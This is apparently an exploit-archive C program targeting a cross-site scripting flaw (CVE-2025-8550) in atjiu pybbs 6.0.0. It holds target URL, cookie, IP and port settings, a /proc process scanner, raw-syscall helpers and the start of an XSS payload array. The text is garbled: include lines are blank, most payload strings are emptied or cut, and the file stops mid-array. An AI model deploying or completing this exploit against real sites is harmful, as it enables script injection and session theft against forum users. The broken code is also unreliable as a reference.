atjiu pybbs 6.0.0 – Cross Site Scripting (XSS)


/*
 * Exploit Title : atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)
 * Exploit Author: Byte Reaper
 * Vendor Homepage: https://github.com/atjiu/pybbs
 * Tested on: Kali Linux
 * CVE: CVE-2025-8550
 * ------------------------------------------------------------------------------------------------------------------------------------
 */

#include 
#include 
#include 
#include 
#include 
#include "argparse.h"
#include 
#include 
#include 
#include 
#include 

/* Buffer capacities. Their uses are outside this excerpt, so only the sizes
 * themselves are stated here. */
#define FULL_URL 3500          /* capacity of a plain URL buffer */
#define FULL_PAYLOAD_URL 9000  /* capacity of a URL-plus-payload buffer */
#define BUFFER_SIZE  6000      /* capacity of the generic I/O buffer */

/* File-scope state shared by the rest of the program.
 * NOTE(review): these look like they are filled in from the argparse
 * command-line options, which are not visible in this excerpt — confirm
 * before relying on any pointer below being non-NULL. */
int selCookie = 0;             /* flag: presumably selects cookie handling; verify against option parsing */
const char *cookies = NULL;    /* raw cookie string, if supplied */
const char *baseurl = NULL;    /* base URL of the target instance, if supplied */
const char *nameFileC= NULL;   /* file name, purpose not visible here */
int cookiesPayload = 0;        /* flag, purpose not visible here */
const char *ip = NULL;         /* host address, if supplied */
int port = 0;                  /* TCP port, 0 means unset */
int verbose = 0;               /* non-zero enables extra output (presumably) */

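/*
 * Scan /proc/<pid>/comm for the first running process whose name contains
 * one of a fixed list of server-related names (python, apache2, python3,
 * mysql) and report it.
 *
 * Returns 0 when a match is found (its name and PID are printed first),
 * 1 when /proc cannot be opened or nothing matches.
 *
 * Fixes relative to the original: the match path no longer leaks the open
 * FILE (it returned without fclose), isdigit() is given an unsigned char
 * (a negative plain char is undefined behaviour), a truncated path is
 * skipped instead of opened, and the closing banner — previously dead code
 * after the return — is printed on every exit path.
 */
int serchServer_alt(void)
{
    static const char *const nameProcess[] = {
        "python",
        "apache2",
        "python3",
        "mysql",
        NULL
    };
    int rc = 1;

    printf("\e[0;35m============================================ [SEARCH PROCESS] ============================================\e[0m\n");

    DIR *d = opendir("/proc");
    if (!d) {
        goto out;
    }

    struct dirent *entry;
    /* Stop at the first match; rc flips to 0 inside the loop. */
    while (rc != 0 && (entry = readdir(d)) != NULL) {
        /* Only numeric directory names are PIDs. */
        if (!isdigit((unsigned char)entry->d_name[0])) {
            continue;
        }

        char cmdpath[256];
        int n = snprintf(cmdpath, sizeof cmdpath, "/proc/%s/comm", entry->d_name);
        if (n < 0 || (size_t)n >= sizeof cmdpath) {
            continue; /* cannot happen for a numeric PID, but never open a truncated path */
        }

        FILE *f = fopen(cmdpath, "r");
        if (!f) {
            continue; /* process may have exited between readdir and fopen */
        }

        char comm[256] = {0};
        if (fgets(comm, sizeof comm, f)) {
            for (int i = 0; nameProcess[i]; i++) {
                if (strstr(comm, nameProcess[i])) {
                    printf("\e[0;34m[+] Process found: %s (PID: %s)\e[0m\n", nameProcess[i], entry->d_name);
                    rc = 0;
                    break;
                }
            }
        }
        fclose(f); /* closed on the match path too — the original leaked it here */
    }
    closedir(d);

out:
    printf("\e[0;35m==========================================================================================================\e[0m\n");
    return rc;
}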
/*
 * Terminate via the raw x86-64 Linux exit syscall (nr 0x3C = 60) with
 * status 0. Syscall 60 is `exit`, i.e. it ends the calling thread, not
 * `exit_group`. Because libc's exit path is bypassed, no atexit handlers
 * run and buffered stdio output is not flushed.
 *
 * Linux/x86-64 only: the register-pinned operands below are the GCC/Clang
 * idiom for a raw syscall.
 */
void exitSyscall(void)
{
    register long nr __asm__("rax") = 0x3C;
    register long status __asm__("rdi") = 0;

    __asm__ volatile("syscall"
                     : "+r"(nr)
                     : "r"(status)
                     : "rcx", "r11", "memory");
}

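/*
 * Validate the byte count returned by an snprintf-style call against the
 * capacity of its destination buffer.
 *
 * len    - return value of the formatting call (negative means error)
 * buf    - the destination buffer; not inspected, kept for the caller's
 *          signature
 * bufcap - capacity of buf in bytes
 *
 * Returns 0 when 0 <= len < bufcap, after printing a confirmation line.
 * Otherwise prints a diagnostic and terminates through exitSyscall().
 * stdout is flushed before that call: exitSyscall() is a raw exit syscall
 * that skips stdio cleanup, so without the flush the diagnostic is lost
 * whenever stdout is a pipe or file. The trailing `return 1` is reached
 * only if exitSyscall() ever returns.
 */
int checkLen(int len, char *buf, size_t bufcap)
{
    (void)buf;

    if (len >= 0 && (size_t)len < bufcap) {
        printf("\e[0;34m[+] Len Is Not Long (%d).\e[0m\n",len);
        return 0;
    }

    printf("\e[0;31m[-] Len is Long ! \e[0m\n");
    printf("\e[0;31m[-] Len %d\e[0m\n", len);
    fflush(stdout); /* raw exit syscall would otherwise drop buffered output */
    exitSyscall();
    return 1;
}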
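/*
 * Sleep for 500 ms using the raw x86-64 Linux clock_nanosleep syscall
 * (nr 230): clock_nanosleep(CLOCK_MONOTONIC (= 1), flags 0, &ob, NULL).
 *
 * Fix: the `syscall` instruction overwrites rcx and r11, which the original
 * asm did not list as clobbered, so the compiler was free to keep a live
 * value in either register across the call. Operands are now pinned to
 * their registers instead of being moved by hand, so an input can never be
 * allocated to a register the asm itself overwrites.
 *
 * The syscall's return value (for example -EINTR) is ignored, as before;
 * an interrupted sleep simply ends early. Linux/x86-64 only.
 */
void nanoSleep(void)
{
    struct timespec ob = { .tv_sec = 0, .tv_nsec = 500 * 1000 * 1000 };

    register long nr __asm__("rax") = 230;
    register long clockid __asm__("rdi") = 1;   /* CLOCK_MONOTONIC */
    register long flags __asm__("rsi") = 0;     /* relative sleep */
    register const struct timespec *req __asm__("rdx") = &ob;
    register long rem __asm__("r10") = 0;       /* no remainder wanted */

    __asm__ volatile("syscall"
                     : "+r"(nr)
                     : "r"(clockid), "r"(flags), "r"(req), "r"(rem)
                     : "rcx", "r11", "memory");
    (void)nr; /* return value intentionally unused */
}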

const char *payloads[] =
{
    "",
    "\">",
    "",
    "",
    "",
    "click",
    "XSS",
    "